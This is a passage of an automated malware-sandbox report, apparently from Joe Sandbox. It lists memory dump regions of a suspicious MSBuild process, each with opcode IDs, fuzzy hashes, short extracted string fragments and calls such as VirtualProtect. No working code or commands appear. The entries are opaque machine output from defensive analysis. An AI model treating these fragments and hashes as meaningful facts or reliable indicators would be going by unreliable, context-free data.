                          • Instruction Fuzzy Hash: 24429031A006158FDB18CF68C8C4BA9FBB6BF55304F1485A9D85A9B356CB30AD92CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: .$K$c
                          • API String ID: 0-3458198900
                          • Opcode ID: 86f1999d60257365eae32efaf8a9d0f01c3dc89f108c53c81b58a6e6d9d33e45
                          • Instruction ID: 9779fde5542884501b5634e2970983a3850140c1225a323d7cef60d760acbda0
                          • Opcode Fuzzy Hash: 86f1999d60257365eae32efaf8a9d0f01c3dc89f108c53c81b58a6e6d9d33e45
                          • Instruction Fuzzy Hash: A802B030A006558FDB18CF68C8C4BBCFBF6BF55300F1495A9D95A9B256CB30A982CF91
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: .$Dqq
                          • API String ID: 0-365989988
                          • Opcode ID: 83837cd420c76312830af966b7cdb551f8213b72f27371cbc6053d2d1f080687
                          • Instruction ID: 1145c20da786a81f65bff57e982cb77faa118158c4858fb42726ed4c421191e6
                          • Opcode Fuzzy Hash: 83837cd420c76312830af966b7cdb551f8213b72f27371cbc6053d2d1f080687
                          • Instruction Fuzzy Hash: 5972A170A00255CBDF25CF29C9847EDBBB2BF85314F1495AAD84AAB395DB309D82CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: -$.
                          • API String ID: 0-3807043784
                          • Opcode ID: 31f4306addf89841b425b64d8f65d7dee232d1f16d908a3fb6612f952a2639a2
                          • Instruction ID: 96e7cf7cea31c560a6404ba54b32580bb4bc25b5676230b1806413d785eda7e0
                          • Opcode Fuzzy Hash: 31f4306addf89841b425b64d8f65d7dee232d1f16d908a3fb6612f952a2639a2
                          • Instruction Fuzzy Hash: 18725D709142698BCB25CF19CD807E9BBB2BB55310F1895E6D84EAB346DB309D82CF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Pljq$$jq
                          • API String ID: 0-1466860515
                          • Opcode ID: 0211dcc5a56c69442a0ff5c1639ef853121a8ec4544708d7731453fe20bf18dd
                          • Instruction ID: e14905fb7f108da63aa46039c2c108c992ef1b52fd5932018865e89b7f612f20
                          • Opcode Fuzzy Hash: 0211dcc5a56c69442a0ff5c1639ef853121a8ec4544708d7731453fe20bf18dd
                          • Instruction Fuzzy Hash: 0D221235B002058FDB14DF29C984E6ABBF6BF89710F1580A9E516DB3A5DB71EC41CBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 18eec670ceaf63c7f9c4626af9d90eedfb23d6b96ed7da6d094010873fa3a9fc
                          • Instruction ID: 114e0ee3a4a8945a034a6d73412054e03f0617c22494150ecfa54a7807d20d5e
                          • Opcode Fuzzy Hash: 18eec670ceaf63c7f9c4626af9d90eedfb23d6b96ed7da6d094010873fa3a9fc
                          • Instruction Fuzzy Hash: 70826930A00B52CFCB65CF69C984B6AF7F2FF44304F148A69D59A87651DB34E896CB80
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: J Gf
                          • API String ID: 0-4131994634
                          • Opcode ID: b268bc4b32c97e1d47b0b0d2bbbf1f67c2808cd5b5f2a056a7873ff0c56e683c
                          • Instruction ID: 979af83d1ee15fa5c0584c9e1e325fb84d8d40359837f97327c028cd8f292462
                          • Opcode Fuzzy Hash: b268bc4b32c97e1d47b0b0d2bbbf1f67c2808cd5b5f2a056a7873ff0c56e683c
                          • Instruction Fuzzy Hash: 49813930A05209DFCB48EFA9E499BADB7F6FB48305F418069E516EB2A5EB345D44CF40
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: J Gf
                          • API String ID: 0-4131994634
                          • Opcode ID: 2b0f7f60fb349055aed09cdc1213b71cfeed6b9fbdd8a4cab553ff11d5b26f6f
                          • Instruction ID: e15374037271dfd3a2ee7ad160d9cd97ab30fc6cea30d8c360a3d89eb0146f3f
                          • Opcode Fuzzy Hash: 2b0f7f60fb349055aed09cdc1213b71cfeed6b9fbdd8a4cab553ff11d5b26f6f
                          • Instruction Fuzzy Hash: DB813A70A05209DFDB48EFA9E498BADB7F6FB48305F418069E516EB2A5EB345D44CF00
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe006d66052dbc3585beda71e2151e68dc709b49af90e49810c9d65ec3e46ebf
                          • Instruction ID: 20d49cd3c280546b7d78329fe73c7fc5415093d7b1572c00c98370f34129ce71
                          • Opcode Fuzzy Hash: fe006d66052dbc3585beda71e2151e68dc709b49af90e49810c9d65ec3e46ebf
                          • Instruction Fuzzy Hash: D0C2DF70A042548FDB25CF28C984BA9BBF2AF45304F1981E9D49A9B356CB71ED86CF50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 19aed9fd7755032957d427e867a86478e15fba23370e78108f7826ea8d3947e9
                          • Instruction ID: ca0d89db57bab0683b2109a1a36a9f052a8b32c7f88d8973d0f09ab36bf0a328
                          • Opcode Fuzzy Hash: 19aed9fd7755032957d427e867a86478e15fba23370e78108f7826ea8d3947e9
                          • Instruction Fuzzy Hash: 5842B331A007528FCB25CF69C884AABFBF6FF85310B1585AAD546DB252DB31EC42CB51
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3511033488403a7cb77ef0c9e97653ad96bd5ad4410eb9f840be5ac9fd1ccbe8
                          • Instruction ID: 841b3300002d7f04200ee09f09e831b0ecc13ac6c02b63a279a8e960576ea32a
                          • Opcode Fuzzy Hash: 3511033488403a7cb77ef0c9e97653ad96bd5ad4410eb9f840be5ac9fd1ccbe8
                          • Instruction Fuzzy Hash: 7AC1BD30A007158FCB28DF69C58066EBBF6FF88310F648A2DD5568B790DB35E946CB91
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff2e49510e1b6ebb9d6a4f1d429e1124d1469f634d51a4cefc2fa5c1cd0411c6
                          • Instruction ID: 80e5655b4edc0d221d5477d5d60a198452ce0ec8ce669a8f50c5c575e3a1f75f
                          • Opcode Fuzzy Hash: ff2e49510e1b6ebb9d6a4f1d429e1124d1469f634d51a4cefc2fa5c1cd0411c6
                          • Instruction Fuzzy Hash: 27917030A08205CFEB18DB55E848BADB7F7BB8C325F558065D90AE7299E774AC80CB10
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f56087717fa151f00e0dde46011fb68ce8ad368278c90a46817e3a1596d24b43
                          • Instruction ID: bc56efa6cc3d46eceb1a469de63929268a2ef1db531b40af7004c33d3b685950
                          • Opcode Fuzzy Hash: f56087717fa151f00e0dde46011fb68ce8ad368278c90a46817e3a1596d24b43
                          • Instruction Fuzzy Hash: 2B919130A08205CFEB1CDB55E844BADB7F7BB8C325F558165D90AE7289D774AC81CB50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4ab1f1d0b9ae37bec73144981b5fa8f25c06bfb54a8eb22dd77f7a990975eeed
                          • Instruction ID: 229bbdaa67fa9a0581e11e8c99ae986eff1697a026a47242f000bb79932a6aed
                          • Opcode Fuzzy Hash: 4ab1f1d0b9ae37bec73144981b5fa8f25c06bfb54a8eb22dd77f7a990975eeed
                          • Instruction Fuzzy Hash: 0791AF30A08205CFEB1CDB55E884BADB7F7BB88325F558065D90AE7289E734AC81CB50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2de5c9486f4c546868b6c97ca5d2bb4bbdde0d517d7f4a404802d28a3cb20c46
                          • Instruction ID: eed052deb64829031e1f6e7fe08d378d1f5361d29a73c53148abe0e7f5a1a9c4
                          • Opcode Fuzzy Hash: 2de5c9486f4c546868b6c97ca5d2bb4bbdde0d517d7f4a404802d28a3cb20c46
                          • Instruction Fuzzy Hash: A0916030A08205CFEB18DF55E848BADB7F7BB8C325F558065D90AE7299D774AD80CB10
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 230f2270a330400156c17d74305f7205432bcc0aedf2f804b8d19ea6bcd76a40
                          • Instruction ID: e2ab271da3afa212610adb84a26e5e193a1a5e043c98c1ae458399b862e14004
                          • Opcode Fuzzy Hash: 230f2270a330400156c17d74305f7205432bcc0aedf2f804b8d19ea6bcd76a40
                          • Instruction Fuzzy Hash: C5916030A08205CFEB18DF55E848BADB7F7BB8C325F558065D90AE7299D774AD80CB10
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f7b56d1a8f775edf2138032ff884ee9f6071cc1e63a4c1a2b1619386dc1e5ad
                          • Instruction ID: 7407183c1dfc6bd6e2d4249edf61f8b6b333c39758fa18dcb6d5f2eb103d6868
                          • Opcode Fuzzy Hash: 8f7b56d1a8f775edf2138032ff884ee9f6071cc1e63a4c1a2b1619386dc1e5ad
                          • Instruction Fuzzy Hash: 8B517334B09601CFE728DB29E058F7A7BE7BB88311F5581B9D4068B299DB799C41CB41

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$4'jq$4'jq$4'jq$4'jq$pnq
                          • API String ID: 0-2343140522
                          • Opcode ID: a400d6396dc172f70a0eb525fcb18870cf1cf894ce0646a571e94af5b87c8bca
                          • Instruction ID: e3e38261fb0c124284a98a82f12b9b5880796cb6609f1cc7ee2059f36db74831
                          • Opcode Fuzzy Hash: a400d6396dc172f70a0eb525fcb18870cf1cf894ce0646a571e94af5b87c8bca
                          • Instruction Fuzzy Hash: 2CD16036A00114DFCB09DF64C944EAABBB7FF88310F0544A8E609AB276D736ED55DB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$(nq$(nq$Hnq
                          • API String ID: 0-2034404110

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: -$4'jq$XXjq$$jq
                          • API String ID: 0-1732080767

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$(nq$(nq
                          • API String ID: 0-1280547490

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hnq$Hnq$Hnq
                          • API String ID: 0-1699790779

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$4'jq
                          • API String ID: 0-3078559419

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$(nq$Hnq
                          • API String ID: 0-1151833592

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: U$xnq$c4
                          • API String ID: 0-264055591

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: foq$ foq$4'jq
                          • API String ID: 0-1996121179

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: foq$ foq$4'jq
                          • API String ID: 0-1996121179
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          APIs
                          • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0651D44B
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2357012271.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6510000_MSBuild.jbxd
                          Similarity
                          • API ID: CallbackDispatcherUser
                          • String ID: 4'jq
                          • API String ID: 2492992576-3676250632
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq$$jq
                          • API String ID: 0-3720491408
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$d
                          • API String ID: 0-2356140993
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$Hnq
                          • API String ID: 0-3116299003
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$,nq
                          • API String ID: 0-719044535
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$pnq
                          • API String ID: 0-968720291
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$(nq
                          • API String ID: 0-2974481825
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          • Opcode ID: adf6c1bf6e6784a46da9983f6fcb24ce6ee5bafff9d582ce8f2eaa5fbf8f432a
                          • Instruction ID: adf7c2e8b42c67c1448198aad8c2610416d49872d9825f66f3212a2f966d7509
                          • Opcode Fuzzy Hash: adf6c1bf6e6784a46da9983f6fcb24ce6ee5bafff9d582ce8f2eaa5fbf8f432a
                          • Instruction Fuzzy Hash: FC315C28F146358B0FBAA339926CA3E189BBFC4550394295DCC67DB3D8DE28CC4253C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq
                          • API String ID: 0-1204115232
                          • Opcode ID: ca46c7bbd97b692d15040d2f14d3154c1d2a79cb82afcdd808c1872f8db785e9
                          • Instruction ID: affbcb070b1db63d7dd8f24b067b13e687c4b6413a03c5344b864f1dac448345
                          • Opcode Fuzzy Hash: ca46c7bbd97b692d15040d2f14d3154c1d2a79cb82afcdd808c1872f8db785e9
                          • Instruction Fuzzy Hash: B031B434B00318CF9B3966684554A3E29AFAFC4550B5A6D69CD43CB7D5DE34CC029BE1
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$Hnq
                          • API String ID: 0-3116299003
                          • Opcode ID: d4dd76dff314e6e73ffc43f3e0bfae613b479fba5394372f5b43e043797ab9c2
                          • Instruction ID: 099ddcd3902cbc907a8ed935c78839db5cc1f9f685d3b2058876b4ae4b5f87c4
                          • Opcode Fuzzy Hash: d4dd76dff314e6e73ffc43f3e0bfae613b479fba5394372f5b43e043797ab9c2
                          • Instruction Fuzzy Hash: 8B31AE30A007118FC7A4DF6ED8806AFBBE6FF88200B144569D54AD7351DE70AD0A8B91
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq$Hnq
                          • API String ID: 0-3116299003
                          • Opcode ID: e5bf0ead09502bf51608fd2a408e90a3eddddcbefe33d03e99d5d1fb2d51ad34
                          • Instruction ID: a6715a3a5829929c0c37f123e934dec0680916e363b00a92107944953bb5a281
                          • Opcode Fuzzy Hash: e5bf0ead09502bf51608fd2a408e90a3eddddcbefe33d03e99d5d1fb2d51ad34
                          • Instruction Fuzzy Hash: 0F313B717052448FD7059BA9D9507AF3BAAEF96301F1541A6C805CB3B1DF34CD0A8751
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: xnq$c4
                          • API String ID: 0-1975259164
                          • Opcode ID: b65282eda07771d93d8890356486affe22fdc7f269aa6ea9efaf30f18131e257
                          • Instruction ID: a3b7e3f3523ff9afa6f31e22cee1eaef07b8fb25bc91e897ba85a5469b15f797
                          • Opcode Fuzzy Hash: b65282eda07771d93d8890356486affe22fdc7f269aa6ea9efaf30f18131e257
                          • Instruction Fuzzy Hash: A9214D34A041149FDF18DFA9E450FAEBFF6FB4C311F10816AE516AB284D730A855CB95
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: -$XXjq
                          • API String ID: 0-3937903693
                          • Opcode ID: 2c28865bd1f2568b1fdbb700e18500f082b40cc598126938d9dfd878d818f9d2
                          • Instruction ID: ec9b0858c383832d2dcfce0c79463aae4623e33c5b1beee090499a1d3d0940f2
                          • Opcode Fuzzy Hash: 2c28865bd1f2568b1fdbb700e18500f082b40cc598126938d9dfd878d818f9d2
                          • Instruction Fuzzy Hash: A9315E31900209CBCF04DFA8D9806DDB7B5FF54310F14867ADD557B259EBB16A8ACBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,nq
                          • API String ID: 0-1069744364
                          • Opcode ID: 39687da3b730682d4af13fa6fadf98fdc0f5fa803353e5cafcf061a13a3823f9
                          • Instruction ID: 1f33c92483cead6b206172f415cbab3e4f78cd5ffc3b7119d0889c6a43c9e09a
                          • Opcode Fuzzy Hash: 39687da3b730682d4af13fa6fadf98fdc0f5fa803353e5cafcf061a13a3823f9
                          • Instruction Fuzzy Hash: 74520875A002288FDB68CF69C985BEDBBF6BF88300F1541D9E509A7361DA309D85CF61
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (_jq
                          • API String ID: 0-2603807687
                          • Opcode ID: 1af8b0319bce27c610331403ec6a8fd7f0a467bd6eb02ee428eeee440aefa7e3
                          • Instruction ID: 30e31c09effcc88e1d62a41fd9e663b6f0bd9dea581fdcec28df92a6a852d254
                          • Opcode Fuzzy Hash: 1af8b0319bce27c610331403ec6a8fd7f0a467bd6eb02ee428eeee440aefa7e3
                          • Instruction Fuzzy Hash: 18226D36A102159FDB18DFA8D494A6DBBF2FF88300F158169E905EB3A5DBB1EC41CB50
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq
                          • API String ID: 0-2886413773
                          • Opcode ID: 2815a54ac142fefa8d8aa37c68080aa2a9f11455d4270b8d518764ba423500fa
                          • Instruction ID: 215975c976bed189f72841c9dc75735bd195621edad9f69b48cbcd579d6d8449
                          • Opcode Fuzzy Hash: 2815a54ac142fefa8d8aa37c68080aa2a9f11455d4270b8d518764ba423500fa
                          • Instruction Fuzzy Hash: 16E19B72B042528FEB29DF69C458B3A7AF2FF85200F184129EA56CB391DB35DC45CB61
                          APIs
                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 012ACAF4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331692491.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                          Joe Sandbox IDA Plugin
